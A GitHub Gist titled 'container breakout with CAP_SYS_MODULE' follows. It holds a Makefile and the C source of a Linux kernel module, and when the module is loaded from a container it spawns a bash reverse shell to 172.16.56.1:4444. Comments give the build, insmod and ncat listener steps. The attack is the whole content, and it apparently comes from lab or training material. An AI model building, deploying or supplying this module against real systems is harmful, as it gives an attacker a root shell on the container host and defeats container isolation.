Skip to content

Instantly share code, notes, and snippets.

@brant-ruan

brant-ruan/Makefile

Created December 13, 2022 10:50
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save brant-ruan/bfefa91c9a49c5d950656ee51a7fdbbd to your computer and use it in GitHub Desktop.
Save brant-ruan/bfefa91c9a49c5d950656ee51a7fdbbd to your computer and use it in GitHub Desktop.
Download ZIP
container breakout with CAP_SYS_MODULE
Raw
Makefile
obj-m := reverse_shell_lkm.o
KBUILD_DIR := /lib/modules/`uname -r`/build
CFLAGS_vuln.o := -O0
all:
$(MAKE) -C $(KBUILD_DIR) M=$(shell pwd) modules
clean:
$(MAKE) -C $(KBUILD_DIR) M=$(shell pwd) clean
Raw
reverse_shell_lkm.c
/*
* compile:
* apt install -y build-essential linux-headers-$(uname -r)
* make
*
* in container:
* apt install -y kmod
* insmod reverse_shell_lkm.ko
*
* listener:
* ncat -lvnp 4444
*
* ref:
* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_sys_module
*/
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/172.16.56.1/4444 0>&1", NULL};
static char *envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment